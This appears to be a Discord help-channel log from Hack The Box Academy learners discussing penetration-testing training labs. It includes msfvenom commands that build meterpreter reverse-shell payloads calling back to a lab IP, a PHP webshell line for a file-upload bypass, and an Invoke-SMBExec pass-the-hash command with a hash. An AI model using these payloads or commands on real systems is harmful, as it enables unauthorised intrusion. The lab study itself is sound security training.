IMO an easier way to approach it besides just starting off with brute forcing, is to find a real picture that the site allows to be uploaded. When you do this, you instantly know what file type, mime filter, content-type, etc are all allowed with pretty much zero thought required. From there it's just finding how to get your shell into that format.

really a waste of time to brute force it all when you can simply upload a real pic 🙂

Sure but what about fuzzing the content type & myme bypass?

well as he said, and to expand on it, just upload a real picture with the extension

if you can successfully upload the file, then the file's mime type and content type are allowed through

and you'll figure it out

¯_(ツ)_/¯

yeah the the file type would probably need to be automated, but everything else you can infer from the file you uploaded

I see fair enough thankyou

Is there anyway to reset answers on a module section? I'm currently doing the Broken Authentication module I started doing it yesterday and between yesterday and today the module got updated, and now it says I've completed some sections but the lab is completely different and it still has the old lab answer saved for the section with no way of me putting in any new answer to complete the new lab

No, I don't believe so

It's something I believe the team is looking into

Okay cool appreciate the answer!

I think it popped up bc people were also having issues with other updated/overhauled modules

I'm playing around in the documenting and reporting lab trying to find a good solution to the terminal output logging. I am using .zsh on kali and tried using the "script" command to log it, which worked, but it gave a really weird output when I opened it anywhere other than the terminal.

How am I supposed to get those clean code blocks with the <SNIP> that are featured in all of the modules?

For instance, I get this doing a searchsploit

When it should look something like this

When I use the cat command it formats it properly, but that would not allow me to pull the unneeded section and insert the <SNIP> portion

Are they that concerned with how we present our data, because I'm used to using just screenshots

Have you tried in tmux?

command is generally sufficient with screenshots

but also if the log is using colors, then a fair bit is because of that

it's pulling bash/zsh color schema which basically wraps text in a color but it uses a code for it

it's the secret sauce magic behind your terminal showing the (user<symbol>hostname) ---

it also looks like there's some other hex magix going on

https://www.eso.org/~ndelmott/ascii.html

yeah it's adding in some hex magics whitespace characters

<0x1B> is the "Escape" key in hex

I have barely ever used tmux before today, and it was not set up for logging, but I will try that at some point and see what the output looks like. I don't have much hope though because when I tried just using tmux in general it was within zsh. tmux is just a multiplexer from what I understand, right? To me that seems like it just wouldn't output anything different than what I am already seeing since it's the same shell

That makes sense!

also the point of logging is so that you can cat it at a later point and screenshot it

No idea. Just a thought.

and to cover your ass if client says you fucked shit up 🙂

or review for any missed info*

yep

I am going to give it a shot later once I'm through the end of the Attacking Enterprise Networks section

eh

not worth getting used to a whole new terminal over it

Yeah, I feel like at this point I'll log it for good practice with the "script" command as more of a simulated "cover my ass"

tmux is it's own terminal with it's own shortcuts which takes time to even get used to using

I immediately sort of was put off by it, and that's a personal preference thing

A lot of it's features are nice, just not worth the headache for me, personally, to learn how to access and use them -- or configure it to do what I want

Where do they get these templates from? I didn't see a link in the module.

I feel like I've seen these before with a tool that helps you write them and find the score.

¯_(ツ)_/¯

i mean the template i believe is also in the report template when you load up the exam

so i don't think it's too big of a deal

https://github.com/Jopp-gh/Obsidian-Dune84/blob/main/Wiki/Tables.md here's an interesting find though

at least for markdown

looks like a bunch of css nonsense to make it work

Interesting, thanks!

check the Documentation & Reporting module, in the Resources

on Attacking SQL Databases I've got the flagDB flag but seems the answer is not correct when I submit, bug?

I got the flag from the DB tb_flag table

From attacking common services?

yes

It should be HTB{!..r}

Try refreshing the page and pasting again and making sure no extra spaces

aha! needed to run sqlcmd without the flags -y 30 -Y 30, cleared now

Hi everyone! could anyone possibly nudge me on the first flag in the sliver skills assessment?

Yeah that limits output size

have you ran ||bloodhound||?

hi any one please help me in attacking web applications with ffuf... skill assesment

One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
http://faculty.academy.htb:31353/courses/linux-security.php7
i have got this url but still showing in correct....

im so bored

sounds like it's time to start a new module then

yea

i wanna do smt fun

but besides modules

i kinda wanna figure out my crushes discord password

:)

sounds illegal

lose 2 cubes

who wants to ctf with me?

I know all the hackers here, but the great ones are really few

I can't even verify my email 😢

Reach out to support

Ohoh

I'm also stuck on this if you find a solution please let me know, I've messaged a couple of times in the forum

Dm

@proven swift Dm sent

It was my fault , i put the wrong email . Thanks for the help

Hi I am having trouble using the kernel exploit CVE-2020-0668. I am facing this error when I replace the mozilla maintenence file witht the payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.188 LPORT=7777 -f exe >shell7777.exe

based on the error, it appears to be a 32bit vs 64bit issue. have you tried using a 32bit payload instead?

what is the architecture of the victim box?

I dunno all the other 64bit tools work and when I execute the payload by double clicking it works too

I get a user shell

but i need a system shell with the exploit
`msfvenom -p windows/x86/meterpreter/shell_reverse_tcp LHOST=10.10.14.188 LPORT=7777 -f exe >shell7777.exe
Error: invalid payload: windows/x86/meterpreter/shell_reverse_tcp

can you tell me about the payload to use

the 32 bit one my notes only have 64 bit stuff

paste this into powershell and tell me what it says ```if ([IntPtr]::Size -eq 8) {
Write-Output "64-bit PowerShell"
} else {
Write-Output "32-bit PowerShell"
}

weird. idk then. just try the 32bit version instead i guess.

can you tell me the 32 bit payload command I cannot find it in hacktricks or anywhere
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.188 LPORT=7777 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
will this do?

You should delete this post because it contains spoilers.

Done

i don't know metasploit that intimately you'd have to search google

How do you suggest I request assistance?

How can i join professional lab Alchemy

You should be able to infer the answer. You already know who you need to impersonate to gain higher privileges.

yea I tried looking into hacktrics they only have 64 bit ones

If you don’t specify it should create 32bit by default
Check the output message after it’s created
If you want to explicit specify its -a x86

I only know cuz I guessed though? What's the method of finding out? Can I DM you? I wanna mention something but can't without spoilers? 😅

Ok

hello guys

Please I have a question!
I started HTB CDSA, but when I got the Elastic SIEM module, I don't really know what to do to spawn to the lab target system and complete the module. Is there any I need to set to achieve it?

Doesnt the question tell you what to do and where to navigate to Kibana?

the result is same with 32 bit payload

thanks I got the payload

what module

Good morning everyone, I have recently started studying on HTB but I'm a bit lost. Could someone tell me which modules or paths I should study to start practicing Tier 1 on the Start Point?

windows priv escalation module skill assessment 2

I checked the conditions for the exploit it matches what was shown earlier in the module's kernel exploit section

and winpeas confirmed the possibilites of this exploit

i think i see the problem

htb academy or main platform where the machines are to be hacked?

?????

academy, that part that has level 0 to level 3, start point, but now I saw that there are the recommended modules below

I dont think thats academy can you share the link to the page?

https://academy.hackthebox.com
this is for academy

https://app.hackthebox.com/starting-point

this is the main ctf platform.

you can try doing the starting point boxes to get yourself familiar with the process of ctf

try giving atleast an hour with each machine and if you are still stuck try looking at the walkthroughs

Perhaps the target simply isn't vulnerable to that cve.

yes, I saw that in each layer, at the end of the page there are the recommended modules to go through the phases, I hadn't seen it lol

I dunno what else will work I tried looking into every section and cross check what my privs and options are on this. Then winpeas gave me this which was told in the module I double checked the maintenance file it too matched the criteria and the exploit works. but the payload is giving me the issue

anyways I will look for other paths

thanks for your help tho

nothing can be done if it does not work

sounds like you need to up your power level

yea its stupidly low for the progress on the path I plan to get a membership and do machines to get more xp

but I am on my student membership on this so I gotta finish the path fast

cuz its gonna expire in a few months

i believe in you, you can definitely power up before your time expires.

thanks

Hi, bros. Can someone help me? Im at passwords atacks module and I cant PTH to acces david sharefolder. When I try mimikatz i get this error ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

I tried Invoke modue but no lucky

gnerally going to be permission related

Im logged as David via rdp

Invoke shows that david cant write in the folder

but is David folder, how cant he has no perms?

permissions related to the process, not the folder. privilege is a better word for it.

sekurlsa::lsa uses lsass.exe which requires elevated privileges to access

I got your point. But this question is a bit controversal, since the question need to PTH with David hash to David Folder

what is the result of whoami /priv

||SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege||

The second is disabled

what section are you on

i'm too exhausted to stay up any longer so if you tell me which section you're on i may be able to provide insight, otherwise i'm going to bed

1638

|| Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "dir" -Verbose
VERBOSE: [+] inlanefreight.htb\david successfully authenticated on DC01
[-] inlanefreight.htb\david does not have Service Control Manager write privilege on DC01||

Invoke shows it

smb exec does not open the users directory iirc, how do you know what's the path it will run dir on

use mini to pth and access the shared folder that way

is ATTACKING COMMON SERVICES => Attacking FTP Questions 1 target machine supposed to show an port with ftp open with an standard scan nmap -sC -sV -p-? I couldnt find it and read in forum that its necessary to restart the target several times, is that correct? or is it supposed to not have ftp open?

You do not need to perform full port scan, standard nmap scan should be enough.

Thank you ok, so the machine seems clearly very buggy as the forum also says, than i have to restart it even more times and wait longer

Hey guys, just wondering if there is any open source tool that primarily focusing on obfuscation script block analysis ?

I am doing the Skills Assessment section of Pivoting. I am at the last question where I need to get the flag from Domain Controller. I have got access to the pivot2 machine. From there, when I try to RDP into domain controller, I get error which looks like RDP is not enabled in the Domain COntroller. In the module, we learn a lot of techniques where the pivot server is Ubuntu. However, in this case, all the machines are Windows and the options that I can think of is reduced largely. I tried to set up dynamic port-forwarding on pivot1 machine using plink so that I can perform a nmap scan on pivot2 machine. But it looks like pivot2 machine doesn't have SSH enabled, which means plink won't work. For using ptunnel, the pivot host is assumed to be Ubuntu server which is not true in this case. SocksOverRDP can be used to create RDP tunnel. But proxifier is for desktop applications. And I don't know proxychains equivalent for Windows

i didnt do that module yet and i am not understand all the details you mentiond but this come in mind for me https://github.com/jpillora/chisel

**advanced xss and csrf module **. STUCK.

• CORS MISCONFIGURATION
  qsn : Identify and exploit a CORS misconfiguration to conduct a CSRF attack and exfiltrate the flag.
  vhost needed : ** exfiltrate.htb, exploitserver.htb , vulnerablesite.htb**

I don't understand the question. to extract data from http://api.vulnerablesite.com/data (in my case https://api.vulnerablesite.com:PORT) using CORS misconfiguration , there should be present /data on api site. but in my case there is no such endpoint. then how do i proceed .

N.B - please correct me if my thinking is wrong.

how should I approach this situation

#modules advanced xss and csrf module

Yes, it did.. but after clicking it didn't show up in the lab

Where exactly do you see that there is a /data endpoint?

SQLMAP ESSENTIALS-Skills Assessment. i am currently doing this section. i already found the injection parameter "id" but i get "connection refused" when i use sqlmap

i didn't see /data in the excercise . i saw that in the page where it teach us about CORS misconf.

how do I proceed ?

What does that mean

somebody tell me why please?

The spawn target button right there ?

That usually means port closed

anyone with any suggesstions ?

The module only shows you the method, but doesn't have much in common with the task at the end

"ping" commend works

That’s IP
This is port
One layer above

how to step in to complete the task

#modules

Module: Broken Authentication Skills Assessment

Looking through the Discord search, it seems like this lab was recently updated. If anyone has completed it recently, could I get a sanity check?

I managed to find valid credentials for ||g----s||, but I'm stuck at the OTP 2FA page. I already brute-forced twice from 0000-9999 and got no hits. I'm running Burp with 5 digits now, but it's taking forever (200,000 attempts, lol). The section about 2FA taught us to use the 4-digit code, so I'm wondering if I'm doing something wrong or if it's perhaps a lab issue?

What exactly did you try and what didn't work? Read the module to understand the method

yes I did found an endpoint /index.php?first_name.....
this endpoint may be vulnerable. but not getting any flag

Take a look at the whole website.

Try ffuf instead of Burp

not getiing anything

oh i see thanks

Thank you. Should I stop the 5 digits attack? I'm at 100.000 mark and I'm afraid of losing progress if that was the intended path D:

I don't know. I have not completed the new module. But Burp Community limits the number of requests. That's why it's taking so long.

I'm using the professional version though, but I will try it with ffuf. Thanks!

Then read the module again carefully. Understand the method and then try to find a vulnerable page

Burp Professional should not actually limmit the requests

Yeah, I'm starting to think that brute forcing OTP is not the intended path, neither burp/ffuf works for me. Time to try harder lol

Yes, I clicked it.. then it showed an IP address

I managed to make it work. Feels completely stupid. Thank you very much.

Thats your kibana instance go to port 5601 u will see it

sorry I'm resetting up my PC can't show you rigt now

I am studying the file upload module. If anyone needs help, I am happy to assist.

If my annual subscription for HTB Academy ends and I Want to renew it, will my Pentesting path automatically be reset?

Have you accessed the kibana ?
says in thw question type this in the browser

Only modules you didn't conplete

Hello i'm doing the FILE UPLOAD ATTACKS module, Type Filters section, there is a file upload functionality where you can upload a profile pic, so i got stuck, followed the solution and it says "configure burp, send file, take the request that you sent the file to the repeater, delete the content of the file and change the file type to GIF8 and ‰add <?php system('cat /flag.txt'); ?> to the content

I click send and it says "Only images are allowed"

Despite following the solution step by step, am i doing something wrong?

Thank you for your feedback, I'll check it now.. I should search it on another tab in my browser, right?

in the pwnbox
Or your computer if you have the vpn running

Isn't it in the instance?

the instance given in the module

Instance != target

"Start Instance" starts the pwnbox
"Click here to spawn target" spawns the target

Password attacks > Passwd,shadow & Opasswd
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

i can ssh into will . but when i tried to unshadow the passwd, and shadow. i got an error.
will is not in the sudoers file. This incident will be reported.

Will has a copy somewhere, and you can transfer files to your attack system

See: File Transfer module if you want to find a method

<@&861185840277487616>

<@&861185840277487616> hmm name is sus

bro only got banned ffor a day

he's banned already

As I was typing

https://tenor.com/view/rachel-green-friends-jennifer-aniston-little-gif-15469425315950831355

weird, how I could not get a flag, but same command on pwnbox showed it......

could have spent an eterinity trying to figure out why it was not working on my VM

are we allow to scp a content out to pwn environment if we dont have the access to the /etc/shadow for the current user that is already ssh in?

Maybe the files are in another directory

That can be accessed by the user

wdym? i tried kira credential n ssh in. but still having an error. coz no right to ssh the /etc/shadow out to pwnbox.

What Marcie is trying to tell you is that /etc/shadow is not what you are looking for

Remember to apply every bit of knowledge taught in the module and don't just brute-force everything that stands in your way 🙂 . No need to brute-force the 2FA code 😬

how can I share screenshots?, It's not letting me?

Yes, I've managed to solve it already, thank you!

I got tunnel vision DX been studying nonstop for weeks 😛

Awesome, glad to hear 🙌

Read and follow #welcome

Is there anyone I can ask about kerberos attack module skill assessment last question? I have 2 creds and tgs for kirk

where can I run the VPN connection file?

What are you using? You need a vpn client like openvpn and run the .ovpn file

The pwnbox should be enough for this module since you're just looking through logs

Ok, let me use Open VPN to open the file

In your own environment (e.g. Kali Linux in VirtualBox or VMWare), you’ll download the VPN file from HTB.

In a terminal, run these commands:

cd Downloads
sudo openvpn your_vpn_file.ovpn

Replace “your_vpn_file” with the name of the vpn file you downloaded

So I need to do it from Kali Linux virtual machine.. thank you for the clarification

You’re welcome!!

If you’re running a Linux distro on your host machine, you can also run it from there. But Kali Linux comes pre-installed with many of the tools you’ll be using in these modules, so it’ll be a little easier for you to use that if you’re not very experienced. 🙂

how do I run with Kali, what are needed to be done

To run a Kali Linux virtual machine?

if you're using the pwnbox you don't need to worry about the vpn config file

done it need any connections

it automatically connects to the vpn

☝🏻☝🏻

Pwnbox is really going to be your easiest option if you’re just starting out with this stuff.

and to connect to the htb vpn it's as simple as; download vpn file in your vm --> open terminal --> cd to the directory you downloaded it to --> sudo openvpn <filename>.ovpn (replace <filename> with the approrpiate name, for instance, academy is academy-regular.ovpn

note: don't run the pwnbox and vpn connection at the same time, as you will have a bad time since they will have the same internal tun0 IP; so routing gets messed up and causes collisions

Just did that on my Kali Linux Virtual machine

what do I do next

well towards the bottom you should see Initialization Sequence completed yes?

if so: minimize (DON'T CLOSE) that terminal and open a new terminal

in the new terminal, type ip a and see if you have a tun0 ip

your VPN connection remains while the terminal you ran the sudo openvpn command is open

you should be able to launch a target that has a 10.129.x.x IP and ping it (depending on the module) and even scan with nmap

I can't see the end, I tried to go down, but not letting me.. I think I'll just do the next step

Now I see it, initialisation sequence completed

done, yes

where will I run it?

in the academy page "Click here to spawn target"

Ok

in a NEW terminal

not the same terminal that has the VPN connection

which is why I suggest minimizing, i don't know if Kali has a desktop environment that has workspaces, I use parrot and have workspace 1 being my VPN connection, and do all my work in Workspace 2

so that I don't accidentally close my VPN when cleaning up my terminals between modules

Yes kali has workspaces

should create another workspace?

I recommend it; mostly because it keeps things cleaner

tbh if i had multiple monitors it wouldn't be that big of an issue; but i'm poor

you are not alone my friend!

I also recommend tmux

if you're just starting out, learning tmux isn't bad

i'm just too stuck in the trenches of terminal that switching just was too much work for me to care enough

I just use i3 !

ok arch user

So now I'm in the HTB page, should I now click "spawn the target system!"?

yep

yes

Damn, No I use Debain : )

Hi I need a hint on skill assessment 2 for windows privilege escalation task 2

I suggest going over "Introduction to Academy"

I tried CVE-2020-0668

as it teaches how to interact with Academy

it does not work

Ok done, what's the next step?

?

follow the steps given in the module/section to attack it

you should be able to interact with it from your VM

hey, where you stuck at on task 2?

i need to escalate privilege to SYSTEM, I made the payload both 32 and 64bit versions and used the exploit to replace mozillaMaintenance it works but when I try to start the service I get this error

The question says "Navigate to https://[Target IP]:5601, click on the side navigation toggle, and click on the "Discover". Then, click on the calendar icon, specify "last 15 years", and click on 'Apply'".
how do I go about it

what do you get from the task??

Read the module material it shows screenshot of how to navigate kibana ...

what next?

Ok

just follow the steps, and the rest should follow

to be able to answer the question

hmmm, shouldnt neet use that CVE for that task

we're not here to hold your hand through the section

can do something much simpler imo

I tried to copy the file directly but I do not have priv to replace the maintenance file

can you give a hint?

I tried winpeas it gave me name of the exploit i am using now
I then tried SharpUp nothing much turned up

winpeas...didnt liek the output of that one fo rthi task

SHarp Up tho shuold help

autoenum tools can give wildly out of scope stuff btw

WinPeas, much like LinPeas looks for everything whether you know how to accomplish it or not

let me try it again

you should see seomthing that is related to installing

ok

I get it

spend so much time I can practically see the output of enumeration in front of me

🙂

so like Marcie said, auto enumaration tools have their place, but you will have to analyze results yourself from many techniques and what you have available

Thanks guys I appreciate the advise I will try them now

If you need more help , suggest looking at Miscellaneous Techniques section in the module

In the AD Enumeration & attacks - skills assessment part I when i try to upload chisel to the webshell it fails

i uploaded powerview.ps1 and it works idk why this happens

try something else then ¯_(ツ)_/¯

there's more than one way to pivot

how are other ppl using chisel and it works tho?

could be that it got corrupted/broken in transit ¯_(ツ)_/¯

so could be a connection issue

just saying don't solely rely on one tool

ok

If you haven't already do yourself a huge favor and go get familiar with ligolo, makes pivoting a lot easier in most cases. It saved me a ton of time doing the Attacking Enterprise Network module, and then I saw what the module itself recommended and I was even more glad I chose to use Ligolo instead of trying to proxy through MSF lol

why is the flag not working

You should delete this as it contains spoilers, but that's not the flag it's looking for.

which one is it

because i did what it asked and ye

do i need to scan port 31337

i don't know. i didn't write down any notes about the skill assessment, but I can see the answer is totally different than what you got.

the banner

is literally correct i checked on a youtube video

but its giving me that it its wrong

maybe i am looking at the wrong section, you didn't include it

Network enumartion with nmap - nmap scripting engine

its telling me that the banner is wrong whenn its ltiewrally right

yep that's the one i was looking at. not the flag they're looking for.

but on a utube vid its the same banner

well i say it's not

same banner != right flag

I feel the question is a little tricky, but if your map flags are correct it should get the flag.

i seen the .. but i didnt access because i didnt think the flag would be there as the module hasnt included such a skill but i guess ur meant to use past knowledge from other modules

good job getting it but no spoilers man

pass the struggle to the next person

my bad

So much for that video being correct. 😂

he was just looking at the flag itself to compare not the actual answer i think

Oh

This one tripped me up when I first did it, too. Had to go hunting for scripts that weren’t listed in the course material. Realized the answer was right in front of me the whole time, just didn’t recognize it at first.

Has anyone solved Broken Authentication skills assessment?

module updated yesterday,if anyone have solved it and can give any tip!

What do you need help with? It helps if you tell more what have you done and where you're stuck at.

This is a tier 2 module - please take the discussion to DM.

Okie! sorry!

sorry,didnt know

gonna delete it just in case

ty

Where can I get a tip/help with zephyr initial foothold?

Read #welcome and register your account, you can ask in #prolabs-zephyr .

Ok thx

Im new to HTB academy and this is HARD HARD....lo

welcome to the struggle bus. the journey is hard but very rewarding

Yes....This is going to take some time.....I'm starting from SCRATCH......100% NOOB..

Don't they have an assistant that helps with the modules?

what modules are you starting with? i think they recently added step by step help for some modules if you have an annual subscription